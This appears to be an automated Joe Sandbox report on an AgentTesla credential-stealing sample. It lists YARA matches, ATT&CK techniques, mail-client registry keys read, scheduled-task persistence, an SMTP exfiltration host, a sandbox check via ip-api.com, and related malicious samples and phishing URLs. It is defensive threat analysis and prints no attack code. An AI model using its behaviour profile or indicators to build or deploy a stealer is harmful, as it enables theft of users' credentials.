Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	521 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\lnYkIr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\lnYkIr.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.usertr	0%	Avira URL Cloud	safe
http://ocsp.usertru	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.198.143	true	false	high
ip-api.com	208.95.112.1	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0A	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com/line/?fields=hostingyi;	lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp	false		high
http://us2.smtp.mailhostbox.com	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2186008382.0000000003228000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com/line/?fields=hostingCi	lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.usertr	lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.usertru	lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.91.198.143	us2.smtp.mailhostbox.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1391079
Start date and time:	2024-02-12 20:38:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 75 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.84.231.216, 104.84.231.210
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Simulations

Behavior and APIs

Time	Type	Description
20:39:07	API Interceptor	46x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe modified
20:39:09	Task Scheduler	Run new task: lnYkIr path: C:\Users\user\AppData\Roaming\lnYkIr.exe
20:39:09	API Interceptor	36x Sleep call for process: powershell.exe modified
20:39:12	API Interceptor	30x Sleep call for process: lnYkIr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.198.143	z1CVMarianaAlvarez.exe	Get hash	malicious	AgentTesla	Browse
	ohXZyyZaky.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19040.6591.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.2245.21332.exe	Get hash	malicious	AgentTesla	Browse
	PO-ENG-114099.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.3245.1850.exe	Get hash	malicious	AgentTesla	Browse
	PO_#1109273.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.22358.8429.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2658.21780.19821.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DHL_AWB#20248791029.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
208.95.112.1	SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	ros88477566tyyfh.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
	Tax Returns Of R38,765.js	Get hash	malicious	WSHRAT	Browse	ip-api.com/json/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	YDDE2rhoMw.apk	Get hash	malicious	Octo	Browse	www.ip-api.com/json
	2e.ka	Get hash	malicious	Octo	Browse	www.ip-api.com/json
	AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rDHLAWB5032675620.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	z1CVMarianaAlvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	List of orders.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	DOC PDF New Purchase Order BMSiMbGVzRAUuaJ.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	ohXZyyZaky.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	BN63T5qr1N.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	t3rNXpEr5n.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.Win32.PWSX-gen.19040.6591.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SecuriteInfo.com.Win32.PWSX-gen.10367.16269.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	SecuriteInfo.com.Win32.PWSX-gen.32728.2984.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
fp2e7a.wpc.phicdn.net	http://dse@docusign.net	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://sites.google.com/view/busch-vacuum/home	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	192.229.211.108
	https://bafybeibys33wxb3zsn3kr7v63k6xulnnzzqohzhbw563vnonjrze3yezeq.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://atlli.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://www.vilicicsa.cl	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://tracking.arbolus.com/u/gIKFUa0YUMyAXVmBzVV5WY2QkI/i02bj5CbpFWbnBUO3UzMxIXZtFmc0R3bjNnI/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://lilacsolutions.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://protect-de.mimecast.com/s/S6wVCNOl15IJZqMqT4-IEI	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=https://securecloud.cloud/auth/office/%2Fnew%2Fauth%2FIdvr%2F%2F%2F%2FaG1pY2tlbEB0b25nYXNzZmN1LmNvbQ==#%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%2	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://counteractbalancing.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
ip-api.com	SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ros88477566tyyfh.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	Tax Returns Of R38,765.js	Get hash	malicious	WSHRAT	Browse	208.95.112.1
	REQUEST FOR QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	https://dashboard-coinbases.cloud/	Get hash	malicious	Phisher	Browse	38.91.107.240
	rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rDHLAWB5032675620.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rPO00140263___-Order.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	rDHLAWB5032675620.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.251.85.153
	PO-H23-0006384.exe	Get hash	malicious	FormBook	Browse	119.18.54.24
	z1CVMarianaAlvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	Quotation.doc	Get hash	malicious	Unknown	Browse	204.11.59.228
	List of orders.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Document.htm	Get hash	malicious	HTMLPhisher	Browse	103.21.59.208
	DOC PDF New Purchase Order BMSiMbGVzRAUuaJ.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	ohXZyyZaky.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	BN63T5qr1N.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
TUT-ASUS	SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ros88477566tyyfh.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	Tax Returns Of R38,765.js	Get hash	malicious	WSHRAT	Browse	208.95.112.1
	REQUEST FOR QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	YDDE2rhoMw.apk	Get hash	malicious	Octo	Browse	208.95.112.1
	2e.ka	Get hash	malicious	Octo	Browse	208.95.112.1
	AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rDHLAWB5032675620.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lnYkIr.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\lnYkIr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
